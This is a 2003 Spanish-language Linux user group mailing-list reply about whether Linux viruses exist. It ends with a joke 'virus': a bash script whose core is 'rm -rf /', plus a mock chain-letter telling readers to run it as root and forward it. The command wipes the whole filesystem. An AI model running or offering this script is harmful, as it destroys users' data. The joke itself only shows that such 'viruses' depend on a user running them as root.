[LUG.ro] Re: Anti virus

Sebastián D. Criado lugro@lugro.org.ar
Fri, 4 Jul 2003 11:58:20 -0300

El Viernes 04 Julio 2003 11:14, Martin C escribió:
> Cuál es un ejemplo de virus en linux? porque todos
> coinciden que hay pocos, pero es para no decir que NO
> hay virus para linux (cosa que probablemente haga que
> 'm$gente' se ponga a hacerlos) o porque realmente
> existen?

Lo que hay es poco, y en su mayoria para elf.
El sistema de archoivos de UNIX hace muy dificil la infeccion de todo un
sistema,.
Otro tema es que los archivos tienen que ser seteados especificamente con
permissos de ejecucion.

Tambien va el hecho de que no hay que andar ejecutando cualquier cosa como
root. Para esto un ejemplo:

Yo me he puesto a desarrollar un virus polimorfico que destruye toda la
implementacion, ademas es replicable
Se los paso

- ---cut---cut---cut---cut---cut---cut---cut---cut---cut---
#!/bin/bash

echo "jaja, estas infectado, paso a destruir tu HD"

rm -rf /

echo "Parte polimorfica"
echo "/(/%&//&/)&)(/()/%&/%JKH;BMNB"
echo "Favor de cambiar la parte polimorfica con lo que se le cante"
echo "Listo"
- ---cut---cut---cut---cut---cut---cut---cut---cut---cut---

Bueno, este script va acompañado en un mail con una nota:

Es es un virus simple para GNU/Linux
Favor de cortar por la parte punteada y guardarlo en un archivo con el nombre
de mivirus.sh.
Darle permisos de ejecucion como root y ejecutarlo
Antes de eso, mandele el archivo a toda su lista de contactos que usen
GNU/Linux.

;-))))

Sebastián D. Criado - scriado@ciudad.com.ar